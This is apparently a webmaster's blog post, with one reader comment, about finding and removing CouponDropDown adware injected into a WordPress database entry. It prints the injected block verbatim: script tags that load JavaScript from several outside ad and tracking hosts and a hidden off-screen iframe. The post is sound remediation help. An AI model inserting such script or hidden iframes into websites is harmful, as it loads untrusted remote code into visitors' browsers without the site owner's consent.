WordPress site infected with CouponDropDown Adware

Customers WordPress site got hacked. They use Network Solutions as their host. Network Solutions took their site offline. We had to delete all the WordPress files, upload a clean version, and put their content and theme back. After that the site was back up and running.

I reviewed the site to make sure the permalinks didn’t cause a problem. On one page there were banners ads showing up.


The issue turned out to be a form Cross Site Scripting or SEO poisoning. There was a database entry that had the extra text in it. Here is the text below.


<div id=”__tbSetup”></div>

<script type=”text/javascript” src=”http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862″></script><script type=”text/javascript” src=”https://loading-resource.com/data.js.php?i={6C425871-ABD5-4124-A2B2-C02CE1D37F67}&amp;d=2013-1-17&amp;s=http://mcmanus-darden.com/home/wp-admin/post.php?post=361&amp;action=edit”></script><script id=”__changoScript” type=”text/javascript”>// <![CDATA[

var __chd__ = {‘aid’:11079,’chaid’:’www_objectify_ca’};(function() { var c = document.createElement(‘script’); c.type = ‘text/javascript’; c.async = true;c.src = ( ‘https:’ == document.location.protocol ? ‘https://z’: ‘http://p’) + ‘.chango.com/static/c.js’; var s = document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(c, s);})();

// ]]></script><script id=”__simpliScript” type=”text/javascript” src=”http://i.simpli.fi/dpx.js?cid=3065&amp;m=1″ data-sifi-parsed=”true”></script><script type=”text/javascript” src=”http://www.superfish.com/ws/sf_main.jsp?dlsource=wjfudcm&amp;userId=ezZDNDI1ODcxLUFCRDUtND&amp;CTID=default-US”></script><script type=”text/javascript” src=”http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js”></script><script type=”text/javascript” src=”http://i.simpli.fi/p?cid=3065&amp;cb=dpx_48652254532._hp”></script><iframe id=”l3adg3n-xdm” style=”position: absolute; top: -1000px; left: -1000px; width: 1px; height: 1px;” src=”http://www.vitruvianleads.com/build/xdm.html” width=”320″ height=”240″></iframe>


There were multiple entries under this title. I used the source to figure out the actual page is was effecting. It was entry 361. There were approximately 20 revisions, but it was the original 361 that took the script off the site. It was in some revisions but not all.

I hope this helps someone else….



  1. Thank you very much Grimey! After trawling the web, your article finally made sense and helped me remove those annoying ads. The ads on my blog were linked to ‘CouponDropDown’, these ads had placed itself at the top and bottom of my blog. I had even got to a stage where I considered formatting my laptop and starting over as I thought it was malware spread onto my network.

    After some research and sifting through code, i accessed the database and searched for ‘akamaihd’ and found 4 entries in various locations of the database. Deleted all the script linking to these ads and it solved the issue!

    My blog is now ad-free thanks to this post, I hope it helps other out there too. Much appreciated Grimey 🙂

Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

This site uses Akismet to reduce spam. Learn how your comment data is processed.